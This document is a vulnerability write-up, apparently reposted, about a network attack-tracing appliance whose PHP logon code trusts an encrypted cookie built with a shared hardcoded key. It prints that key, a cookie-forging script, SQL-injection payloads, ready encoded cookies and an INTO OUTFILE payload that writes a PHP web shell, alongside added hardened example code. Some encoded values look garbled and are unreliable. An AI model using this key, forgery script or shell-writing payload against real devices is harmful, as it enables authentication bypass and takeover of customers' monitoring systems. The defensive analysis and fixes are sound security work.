Vulnerability Analysis of an attack Tracing System (affecting customers' core network segments and sensitive monitoring information)

Source: Internet
Author: User
Tags: set cookie


The device is deployed on the intranet, directly connected to the monitored hosts or to the trunk route. It also needs Internet access so that it can connect to the vendor's cloud; it has been in place for a long time. Rules are synchronized with and pushed down from the cloud, and some IP addresses are sent up for big-data correlation and other analysis.

Reading com_function.php:
Code Region
<?php
/**
 * Global user logon information
 */
function global_user_info() {
    global $db, $_COOKIE;

    if (!isset($_COOKIE['user_key'])) return array();

    # Parse the user logon KEY
    $user_key = str_authcode($_COOKIE['user_key'], 'decode');
    if (!$user_key) return array();
    $key_arr = json_decode($user_key, true);

    # Check the logon
    $cu_name = $key_arr['cu_name'];
    $cu_type = intval($key_arr['cu_type']);
    $cu_key  = $key_arr['cu_key'];
    # cu_name and cu_key come straight out of the decrypted cookie and are interpolated into the SQL
    $login = $db->query_one("SELECT * FROM center_user_login WHERE cu_name = '$cu_name' AND cu_key = '$cu_key'");
    if (!$login) return array();

    # Return the logon information
    $ret = array(
        'cu_name' => $cu_name,
        'cu_type' => $cu_type,
        'cu_key'  => $cu_key
    );
    return $ret;
}

/**
 * Global user logout
 */
function global_login_out() {
    global $db, $USER_INFO;

    if (!$USER_INFO) exit('OK');

    # Clear the logon record in the database
    $cu_name = $USER_INFO['cu_name'];
    $cu_key  = $USER_INFO['cu_key'];
    $db->query("DELETE FROM center_user_login WHERE cu_name = '$cu_name' AND cu_key = '$cu_key'");

    # Clear the logon cookie
    setcookie('user_key', '');

    # Return
    exit('OK');
}

/**
 * User login and permission check
 */
function global_user_permiss($type = 0) {
    global $USER_INFO;

    # Obtain parameters
    $cu_name = $USER_INFO['cu_name'] ? $USER_INFO['cu_name'] : '';
    $cu_type = $USER_INFO['cu_type'] ? intval($USER_INFO['cu_type']) : 0;

    # Determine whether the user is logged on
    if (!$cu_name) {
        header("Location: login.php");
        exit;
    }

    # Logged on: check the user's permission level
    # (the right-hand side of this comparison was cut off in the page; $type is the natural reading)
    if ($type && $cu_type < $type) {
        header("Location: index.php");
        exit;
    }
    return;
}

/**
 * Logon password encryption
 * @param string $uname username
 * @param string $upwd  password
 */
function user_pwd_encry($uname, $upwd) {

    # Validation
    if (!$uname || !$upwd) return false;

    # Password hashing
    $pwd = md5(md5($uname) . md5($upwd));
    return $pwd;
}

/**
 * String encryption/decryption.
 * @param $string    the string to encrypt or decrypt
 * @param $operation 'encode' encrypts, 'decode' decrypts
 * @param $key       the encryption key; if empty, the global constant CT_KEY is used
 * @param $expiry    expiry time in seconds (0 = never expires)
 * @return the encrypted or decrypted string
 */
function str_authcode($string, $operation = 'decode', $key = '', $expiry = 0) {
    $ckey_length = 4; // random key length, 0 to 32
    // Adding a random key makes the ciphertext irregular: even with identical plaintext and key the result differs each time, which makes cracking harder.
    // The larger the value, the more the ciphertext varies; the number of possible ciphertexts for one plaintext is 16 to the power of $ckey_length.
    // When the value is 0, no random key is generated.
    $key = md5($key ? $key : CT_KEY); // if $key is not given, use the global constant CT_KEY
    $keya = md5(substr($key, 0, 16)); // the first half of the key is md5'd again; $keya is a 32-byte string
    $keyb = md5(substr($key, 16, 16)); // the second half of the key is md5'd again; $keyb is a 32-byte string
    // For 'decode', $keyc is the first 4 characters of $string; for 'encode' it is the last 4 characters of md5(microtime()), which should be random enough.
    $keyc = $ckey_length ? ($operation == 'decode' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey = $keya . md5($keya . $keyc); // a 64-byte string
    $key_length = strlen($cryptkey);
    // Encryption
    $string = $operation == 'decode' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    // The encryption/decryption process follows; I am not yet familiar with the specific algorithm.
    // (The loop bounds below were cut off in the page and are restored from the Discuz authcode this function copies.)
    $rndkey = array();
    for ($i = 0; $i < 256; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'decode') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}
The important part:
Code Region
    # Parse the user logon KEY
    $user_key = str_authcode($_COOKIE['user_key'], 'decode');
    if (!$user_key) return array();
    $key_arr = json_decode($user_key, true);

    # Check the logon
    $cu_name = $key_arr['cu_name'];
    $cu_type = intval($key_arr['cu_type']);
    $cu_key  = $key_arr['cu_key'];
    $login = $db->query_one("SELECT * FROM center_user_login WHERE cu_name = '$cu_name' AND cu_key = '$cu_key'");
    if (!$login) return array();

    # Return the logon information
    $ret = array(
        'cu_name' => $cu_name,
        'cu_type' => $cu_type,
        'cu_key'  => $cu_key
    );
    return $ret;
}
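The query highlighted above interpolates cu_name and cu_key straight from the decrypted cookie, and the privilege level cu_type is also taken from the cookie rather than from the database. The following hardened replacement is an added example, not the vendor's code. It assumes a mysqli connection in $db_conn, a per-installation secret in $install_key (instead of the shipped CT_KEY), the str_authcode() function as shown on this page, a cu_type column on center_user_login (the page does not show the table schema), and that cu_key is a 32-character hex session token (the page does not state its format).

```php
<?php
// Added example (not the vendor's code): a hardened replacement for global_user_info().
// Assumptions: $db_conn is a mysqli connection, $install_key is a per-installation
// secret (not the shipped CT_KEY), str_authcode() is the function shown on this page,
// center_user_login has a cu_type column, and cu_key is a 32-character hex token.

function global_user_info_hardened(mysqli $db_conn, string $install_key): array
{
    if (!isset($_COOKIE['user_key'])) {
        return array();
    }

    // Decrypt with the installation key. An empty string means the integrity
    // check inside str_authcode() failed or the embedded expiry has passed.
    $user_key = str_authcode($_COOKIE['user_key'], 'decode', $install_key);
    if ($user_key === '') {
        error_log('user_key cookie rejected (bad MAC or expired) from ' . $_SERVER['REMOTE_ADDR']);
        return array();
    }

    $key_arr = json_decode($user_key, true);
    if (!is_array($key_arr) || !isset($key_arr['cu_name'], $key_arr['cu_key'])) {
        return array();
    }

    // Whitelist the shape of both values before they get anywhere near SQL.
    $cu_name = (string) $key_arr['cu_name'];
    $cu_key  = (string) $key_arr['cu_key'];
    if (!preg_match('/^[A-Za-z0-9_.@-]{1,64}$/', $cu_name)
        || !preg_match('/^[A-Fa-f0-9]{32}$/', $cu_key)) {
        // A cookie that decrypts correctly but carries quotes or SQL keywords
        // is worth an alert: only someone holding the key can produce one.
        error_log('malformed user_key payload from ' . $_SERVER['REMOTE_ADDR']);
        return array();
    }

    // Prepared statement: values are bound, never concatenated into the query.
    $stmt = $db_conn->prepare(
        'SELECT cu_name, cu_type FROM center_user_login WHERE cu_name = ? AND cu_key = ? LIMIT 1'
    );
    $stmt->bind_param('ss', $cu_name, $cu_key);
    $stmt->execute();
    $login = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if (!$login) {
        return array();
    }

    // The privilege level comes from the database row, never from the cookie.
    return array(
        'cu_name' => $login['cu_name'],
        'cu_type' => intval($login['cu_type']),
        'cu_key'  => $cu_key,
    );
}
```

Three things change relative to the original: the values are bound with a prepared statement, so quotes in the payload can no longer alter the query; the payload is shape-checked and a well-formed cookie carrying metacharacters is logged, which is a reliable tamper signal because only a key holder can produce one; and cu_type is read from the database row, so a cookie claiming a higher type is simply ignored.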
Tracing the str_authcode function:
Code Region
function str_authcode($string, $operation = 'decode', $key = '', $expiry = 0) {
    $ckey_length = 4; // random key length, 0 to 32
    // Adding a random key makes the ciphertext irregular: even with identical plaintext and key the result differs each time, which makes cracking harder.
    // The larger the value, the more the ciphertext varies; the number of possible ciphertexts for one plaintext is 16 to the power of $ckey_length.
    // When the value is 0, no random key is generated.
    $key = md5($key ? $key : CT_KEY); // if $key is not given, use the global constant CT_KEY
    $keya = md5(substr($key, 0, 16)); // the first half of the key is md5'd again; $keya is a 32-byte string
    $keyb = md5(substr($key, 16, 16)); // the second half of the key is md5'd again; $keyb is a 32-byte string
    // For 'decode', $keyc is the first 4 characters of $string; for 'encode' it is the last 4 characters of md5(microtime()), which should be random enough.
    $keyc = $ckey_length ? ($operation == 'decode' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey = $keya . md5($keya . $keyc); // a 64-byte string
    $key_length = strlen($cryptkey);
    // Encryption
    $string = $operation == 'decode' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    // The encryption/decryption process follows; I am not yet familiar with the specific algorithm.
    // (The loop bounds below were cut off in the page and are restored from the Discuz authcode this function copies.)
    $rndkey = array();
    for ($i = 0; $i < 256; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'decode') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}
This is the Discuz authcode encryption. The key, then, is the default value: define('CT_KEY', '503d2a62fbe03250c61da3655a717748'); the rest is easy to understand.
Code Region
$key_arr = json_decode($user_key, true);
Code Region
$ret = array(
    'cu_name' => $cu_name,
    'cu_type' => $cu_type,
    'cu_key'  => $cu_key
);
So the cookie is JSON: build the JSON, encrypt it with the key, and it is accepted. The important statement is $login = $db->query_one("SELECT * FROM center_user_login WHERE cu_name = '$cu_name' AND cu_key = '$cu_key'"); that is, both cu_name and cu_key are injection points. Now encrypt the data:
Code Region
<?php
/**
 * $string    plaintext or ciphertext
 * $operation ENCODE to encrypt, DECODE to decrypt
 * $key       the key
 * $expiry    validity period of the result
 */
function authcode($string, $operation = 'decode', $key = '', $expiry = 0) {
    // Length of the dynamic key. Because of the dynamic key, the same plaintext produces different ciphertexts.
    // Adding a random key makes the ciphertext irregular: even with identical plaintext and key the result differs each time, which makes cracking harder.
    // The larger the value, the more the ciphertext varies; the number of possible ciphertexts for one plaintext is 16 to the power of $ckey_length.
    // When the value is 0, no random key is generated.
    $ckey_length = 4;

    // Key
    // $GLOBALS['discuz_auth_key'] can be changed as needed.
    $key = md5($key ? $key : $GLOBALS['discuz_auth_key']);

    // Key a is used for encryption and decryption.
    $keya = md5(substr($key, 0, 16));
    // Key b is used for data integrity verification.
    $keyb = md5(substr($key, 16, 16));
    // Key c is used to vary the generated ciphertext.
    $keyc = $ckey_length ? ($operation == 'decode' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    // Key used for the actual computation
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    // Plaintext layout: the first 10 bytes hold the timestamp, checked for validity on decryption; bytes 10 to 26 hold a truncated md5 over the data and $keyb (key b), checked for integrity on decryption.
    // When decoding, start after the first $ckey_length bytes, because the ciphertext stores the dynamic key there so that decryption can reproduce it.
    $string = $operation == 'decode' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    // Generate the key book
    // (the loop bounds below were cut off in the page and are restored from the Discuz original)
    for ($i = 0; $i < 256; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // Scramble the key book with a fixed algorithm. It looks complicated but does not actually add strength to the ciphertext.
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // Core encryption/decryption part
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        // XOR each byte with a byte taken from the key book and convert it back to a character.
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'decode') {
        // substr($result, 0, 10) == 0                  : no expiry set, data is valid
        // substr($result, 0, 10) - time() > 0          : expiry not yet reached, data is valid
        // substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16) : data integrity check
        // See the unencrypted plaintext layout above for these offsets.
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        // The dynamic key is stored in the ciphertext, which is why different ciphertexts of the same plaintext can all be decrypted.
        // The raw ciphertext may contain special characters that get lost when copied, so it is base64-encoded.
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}

$array = array(
    'cu_name' => "hacker' OR 1 LIMIT 1 #",
    'cu_type' => 9,
    'cu_key'  => '123',
);
$c = json_encode($array);
echo authcode($c, 'ENCODE', '503d2a62fbe03250c61da3655a717748');
?>
The encrypted result is as follows:

Because the cookie value is used directly, you only need to modify the cookie. Set cookie: the value of user_key is
Code Region
8586OUNS98IqbV6GGqHeoMjOjEAdaXc/2 IpKP +/samples/fsla6vaRpjeyIr7Dp9NSUsjt6FtEmJzJwr0
Because it contains a plus sign (+), it needs URL encoding:
Code Region
%38%35%38%36%4F%55%4E%53%39%38%49%71%62%56%36%47%47%71%48%65%45%6F%4D%6A%4F%6A%41%64%61%58%63%2F%32%49%70%4B%50%2B%2F%36%4F%31%6E%79%71%43%38%45%62%54%76%70%71%74%43%72%6A%41%7A%75%4E%37%71%70%42%70%45%65%37%65%38%76%35%74%6D%65%48%45%33%51%31%2F%66%6C%73%61%36%76%61%6A%52%70%65%79%49%72%37%44%70%39%4E%53%55%6A%73%74%36%46%74%6D%4A%7A%45%77%30

Because the KEY value is the same everywhere, the cookie generated above can log on to any iron eye device. The MySQL account is presumably root, so one can try to write a shell. EXP:
Code Region
{"cu_name": "bigjj", "cu_type": 9, "cu_key": "jjfly' union SELECT 111, average, 333 into outfile '/tmp/showtime.php' #"}
The web root is /var/www/html/. The encrypted shell-writing cookie:
Code Region
%34%38%65%61%4c%47%55%56%63%50%66%36%4e%4f%43%63%59%67%64%6f%64%6c%4d%5a%75%57%45%6b%79%43%6b%66%32%2b%57%6a%78%4c%59%45%39%78%63%73%47%59%69%6f%4b%59%5a%48%61%61%77%4d%71%74%47%30%71%30%35%68%78%4f%50%6f%30%42%46%31%68%43%32%4c%61%70%42%71%7a%44%43%79%36%4b%67%78%32%6e%33%4f%39%61%34%79%77%2b%31%31%72%64%37%6c%45%50%66%53%44%32%74%78%2f%76%62%58%67%37%72%42%31%4c%46%56%72%72%44%59%43%76%70%55%30%50%53%74%4a%32%73%32%79%62%69%76%46%4a%50%69%79%74%78%52%79%69%55%38%38%6a%54%71%42%71%34%35%47%4c%46%76%53%4c%70%79%79%30%66%57%6e%45%71%57%68%4b%7a%6f%5a%64%6d%2f%46%62%4d%37%78%63%50%61%52%2f%71%75%6d%41%36%42%42%45%34%4a%33%66%34%7a%57%2b%4f%53%68%69%54%55%38%54%6c%6a%4f%75%4c%33%73%6a%6d%63%54%42%47%49%4e%69%55%75%68%73%44%57%66%6e%6b%4f%46%74%67%54%2f%37%50%48%70%6d%51%6d%6c%58%47%77
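The forged cookie works on every device because every device ships with the same CT_KEY and the cookie carries no expiry, so the integrity check in str_authcode() protects nothing. The block below is an added example, not the vendor's code, showing the two fixes on the key side: a per-installation secret that refuses to run on the shipped default, and a logon cookie with a real expiry and cookie flags. It assumes the key file path /etc/tracer/cookie_key (a constructed location outside the web root), the str_authcode() function exactly as shown on this page, and PHP 7.3 or later for the setcookie() options array.

```php
<?php
// Added example, not the vendor's code: replace the shared default CT_KEY with a
// per-installation secret and give the user_key cookie an expiry.
// Assumptions: the key file path below (a constructed location outside the web
// root), str_authcode() as shown on this page, and PHP 7.3+ for setcookie() options.

const DEFAULT_CT_KEY  = '503d2a62fbe03250c61da3655a717748'; // the default quoted on the page
const COOKIE_KEY_FILE = '/etc/tracer/cookie_key';            // assumed location

// True for the shipped default or anything too short to resist guessing.
function is_default_or_weak_key(string $key): bool
{
    return hash_equals(DEFAULT_CT_KEY, $key) || strlen($key) < 32;
}

// Load the installation key, creating a random one on first use.
function load_cookie_key(string $key_file = COOKIE_KEY_FILE): string
{
    if (is_file($key_file)) {
        $key = trim((string) file_get_contents($key_file));
        if (is_default_or_weak_key($key)) {
            // Fail closed: a forgeable key is worse than no login at all.
            throw new RuntimeException("$key_file holds the default or a weak cookie key; regenerate it");
        }
        return $key;
    }
    $key = bin2hex(random_bytes(32));          // 256 bits from the CSPRNG, 64 hex chars
    $old_umask = umask(0077);                  // readable by the service user only
    $written = file_put_contents($key_file, $key, LOCK_EX);
    umask($old_umask);
    if ($written === false) {
        throw new RuntimeException("cannot create $key_file");
    }
    return $key;
}

// Issue the logon cookie: only identifiers in the payload, a real expiry,
// and cookie flags so scripts and plain-HTTP requests never see it.
function issue_user_key_cookie(string $cu_name, string $cu_key, int $ttl = 3600): void
{
    $install_key = load_cookie_key();
    // cu_type is deliberately absent: the privilege level should be read from
    // the database row on lookup, never trusted from the cookie.
    $payload = json_encode(array('cu_name' => $cu_name, 'cu_key' => $cu_key));
    // $ttl becomes the $expiry argument: str_authcode() stores time()+$ttl in the
    // first 10 bytes and the decode branch rejects the cookie once that has passed.
    $value = str_authcode($payload, 'encode', $install_key, $ttl);
    setcookie('user_key', $value, array(
        'expires'  => time() + $ttl,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ));
}
```

Every read of the cookie must then call str_authcode($cookie, 'decode', load_cookie_key()) with the same installation key. Rotating the key file invalidates every outstanding cookie at once, which is the correct response if a device is suspected of having been forged against; with the shipped default there is no equivalent, because the key is the same on every customer's device.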
